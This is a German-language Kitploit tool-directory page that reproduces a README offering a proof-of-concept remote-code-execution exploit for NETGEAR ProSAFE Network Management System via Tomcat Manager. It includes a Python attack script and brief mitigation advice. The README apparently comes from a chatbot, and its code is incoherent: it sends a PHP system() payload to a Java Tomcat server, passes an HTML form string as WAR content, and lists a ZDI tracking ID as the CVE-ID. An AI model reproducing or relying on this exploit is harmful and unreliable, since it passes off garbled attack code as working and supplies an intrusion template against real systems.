Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-5246 — Proof-of-Concept-Exploit, der die Remote-Codeausführung im NETGEAR ProSAFE Network Management System über eine verwundbare Apache-Tomcat-Instanz demonstriert, mit Python-Bereitstellungsskript und Schadensbegrenzungsanleitung. | Kitploit
Tools/GitHubGitHub/abdurahmon3236/cve-2024-5246
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubabdurahmon3236/cve-2024-5246

CVE-2024-5246

Proof-of-Concept-Exploit, der die Remote-Codeausführung im NETGEAR ProSAFE Network Management System über eine verwundbare Apache-Tomcat-Instanz demonstriert, mit Python-Bereitstellungsskript und Schadensbegrenzungsanleitung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Hier ist eine strukturierte README.md für den Proof of Concept (PoC) zur Remote Code Execution (RCE)-Schwachstelle im NETGEAR ProSAFE Network Management System:


Proof of Concept (PoC) für Remote Code Execution im NETGEAR ProSAFE Network Management System

Dieses Repository enthält ein Proof-of-Concept (PoC)-Skript, das eine Remote Code Execution (RCE)-Schwachstelle im NETGEAR ProSAFE Network Management System demonstriert. Die Schwachstelle ist auf die Verwendung einer anfälligen Version von Apache Tomcat im Produktinstallationsprogramm zurückzuführen. Dieses Problem ermöglicht es authentifizierten Angreifern, beliebigen Code auf betroffenen Installationen auszuführen.

Beschreibung der Schwachstelle

CVE-ID: ZDI-CAN-22868

Übersicht: NETGEAR ProSAFE Network Management System enthält eine Remote Code Execution-Schwachstelle aufgrund der Verwendung einer anfälligen Version von Apache Tomcat. Ein authentifizierter Angreifer kann diese Schwachstelle ausnutzen, um im Kontext von SYSTEM beliebigen Code auf dem betroffenen System auszuführen.

Betroffene Versionen:

  • NETGEAR ProSAFE Network Management System-Versionen mit anfälligen Apache Tomcat-Versionen.

Authentifizierung: Erforderlich

PoC-Details

Dieses PoC zeigt, wie ein Angreifer die Schwachstelle ausnutzen kann, um eine Remote Code Execution zu erreichen. Der spezifische Fehler liegt im Produktinstallationsprogramm aufgrund der Verwendung einer veralteten oder anfälligen Apache Tomcat-Version.

PoC-Skript

Das folgende Skript zeigt, wie diese RCE-Schwachstelle ausgenutzt wird. Stellen Sie sicher, dass Sie über die entsprechenden Berechtigungen verfügen, bevor Sie dieses PoC ausführen.

Wichtig: Dieses PoC dient nur zu Bildungszwecken und sollte nicht für unbefugte oder böswillige Aktivitäten verwendet werden.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Change this to the Tomcat Manager URL of the target
username = "admin"  # Change to the valid username
password = "password"  # Change to the valid password

# The payload to be executed on the remote server
payload = """
<?php
    // Payload to execute arbitrary PHP code
    system('whoami');
?>
"""

# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# Headers for authentication
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploit the RCE vulnerability by deploying a malicious web application.

    Args:
        url (str): The Tomcat Manager URL.
        username (str): The Tomcat Manager username.
        password (str): The Tomcat Manager password.
        payload (str): The malicious payload to be executed.
    """
    try:
        # Create a new web application with the malicious payload
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Successfully deployed the malicious web application.")
        else:
            print("[-] Failed to deploy the malicious web application.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Exploiting RCE vulnerability at: {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)

Erklärung

  1. Konfiguration: Setzen Sie target_url auf die Tomcat-Manager-URL des Zielsystems und aktualisieren Sie username und password mit gültigen Anmeldedaten.
  2. Payload: Der Payload ist ein einfaches PHP-Skript, das einen Systembefehl ausführt, um die Codeausführung zu demonstrieren.
  3. Exploit-Funktion: Die Funktion exploit_rce() sendet eine POST-Anfrage, um die schädliche Webanwendung bereitzustellen.
  4. Bereitstellung: Das Skript versucht, eine neue Webanwendung mit dem schädlichen Payload bereitzustellen und gibt das Ergebnis aus.

Wichtige Überlegungen

  • Berechtigungen: Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis haben, diese Schwachstelle auf dem Zielsystem zu testen. Unbefugte Tests sind illegal und unethisch.
  • Testumgebung: Führen Sie Tests in einer kontrollierten Umgebung durch, um Auswirkungen auf Produktionssysteme zu vermeiden.
  • Ethische Nutzung: Verwenden Sie dieses PoC verantwortungsbewusst und nur in autorisierten Kontexten.

Abhilfemaßnahmen

Um diese Schwachstelle zu beheben, führen Sie die folgenden Schritte durch:

  1. Tomcat aktualisieren: Aktualisieren Sie auf eine Version von Apache Tomcat, die die Schwachstelle behoben hat.
  2. Zugriff sichern: Stellen Sie sicher, dass der Tomcat-Manager und andere sensible Schnittstellen gesichert und nur für autorisierte Benutzer zugänglich sind.
  3. Konfigurationen überprüfen: Überprüfen und härten Sie regelmäßig die Konfiguration von Webanwendungen und Servern.

Durch Befolgen dieser Schritte können Sie die RCE-Schwachstelle im NETGEAR ProSAFE Network Management System beheben und die allgemeine Sicherheit verbessern.


Diese README.md bietet eine detaillierte Beschreibung und ein PoC-Skript für die RCE-Schwachstelle, einschließlich Einrichtungsanweisungen, Überlegungen und Abhilfehinweise.

Tool herunterladen